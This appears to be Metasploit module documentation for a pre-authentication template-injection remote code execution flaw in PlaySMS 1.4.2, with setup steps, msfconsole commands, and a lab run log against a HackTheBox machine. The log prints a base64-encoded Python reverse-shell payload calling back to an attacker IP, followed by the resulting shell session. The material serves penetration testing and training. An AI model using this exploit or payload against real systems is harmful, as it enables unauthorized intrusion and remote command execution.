rapid7/metasploit-framework
# Playsms pre auth rce

## Description
This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'.which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with malicious payload and submit. This malicious payload first process by TPL and save value in current template after this value goes for the second process which result code execution.

The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection


## Vulnerable Application 
Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download)

### Vulnerable Application Installation Setup.
 1. Download Application
 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4.2/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4.2/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application (Tested on HactheBox Frolic Machine)
 2. Start msfconsole
 3. Do: `use exploit/linux/http/playsms_pre_auth_rce`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi /playsms`
 7. Do: `check`
```
[*] 10.10.10.111:9999 - The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `run`
 13. You should get a shell.


## Scenarios
### Playsms on Ubuntu Linux
```
msf5 exploit(linux/http/playsms_pre_auth_rce) > set verbose true
msf5 exploit(linux/http/playsms_pre_auth_rce) > run 
[+] python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICwgICAgICAgc3VicHJvY2VzcyAgICAgICwgICAgICAgb3MgICAgICAgOyAgaG9zdD0iMTAuMTAuMTQuMjYiICAgICAgIDsgIHBvcnQ9ODA4MCAgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICAgLCAgICAgICBwb3J0KSkgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgLCAgICAgICAwKSAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAsICAgICAgIDEpICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICwgICAgICAgMikgICAgICAgOyAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
[*] Started reverse TCP handler on 10.10.14.26:8080 
[+] X-CSRF-Token for login : 6724a9cdb72eccdf7a7456309053eadd
[*] Trying to Send Payload in Username Field ......
[+] Payload successfully Sent
[*] Cookies here : PHPSESSID=bodmgesqnfkrjtbhr3nohui0e2;
[*] Command shell session 1 opened (10.10.14.26:8080 -> 10.10.10.111:44564) at 2020-03-12 18:10:37 +0530
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 athlon i686 GNU/Linux


```
